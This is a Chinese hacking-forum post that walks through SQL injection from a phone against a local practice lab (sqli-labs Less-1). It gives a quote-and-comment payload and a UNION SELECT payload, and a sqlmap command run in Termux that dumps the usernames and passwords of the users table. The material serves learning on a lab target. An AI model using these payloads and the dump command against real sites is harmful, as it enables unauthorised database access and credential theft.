无名 发表于 2022-5-8 16:22:53

[NB]手机端的sql注入

今天去踏青,看到灵帝说该发帖了,所以再水水

打开我们的靶场,输入id=1 正常显示
我们靶场的源码是$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
我们输入id=1' --+
就相当于$sql="SELECT * FROM users WHERE id='$id'//' LIMIT 0,1";
把后面给注释掉了,这样我们就可以执行自己的语句
我们输入
http://192.168.3.133:3366/Less-1/?id=-1' union select 1,version(),3 --+
//(字段是3,你也可以用order by自己慢慢试)
可以查看到数据库的靶场,当然如果需要也可以执行别的命令,这里不多讲

这时我们可以知道这个网站是存在注入点的,手机手动注入太累了,打开termux
apt install python2
git clone https://gitee.com/wayfeel/sqlmap
这是gitee加速过的,下载速度很快
然后我们cd进sqlmap目录
直接python2 sqlmap.py "http://192.168.3.133:3366/Less-1/?id=1" -D security -T users -C password,username –dump
爆出密码和用户名
更多sqlmap命令https://blog.csdn.net/weixin_45983744/article/details/104002419

这期的小工具是今天踏青时写的,很垃圾,所以不分享啦
http://cdn.u1.huluxia.com/g4/M01/3E/D2/rBAAdmBpgJCAWZa7AAKzgdvdi0c254.jpghttp://cdn.u1.huluxia.com/g4/M01/3E/D2/rBAAdmBpgJGAcfjrAASdJfYkI7M736.jpghttp://cdn.u1.huluxia.com/g4/M01/3E/D2/rBAAdmBpgJKAPnQ0AAF4DAZ3Thw370.jpghttp://cdn.u1.huluxia.com/g4/M01/3E/D2/rBAAdmBpgJOAStGvAAGEWGk4XLI710.jpghttp://cdn.u1.huluxia.com/g4/M01/3E/D2/rBAAdmBpgJOAJ3t1AAK7ptVpglQ625.jpg
页: [1]
查看完整版本: [NB]手机端的sql注入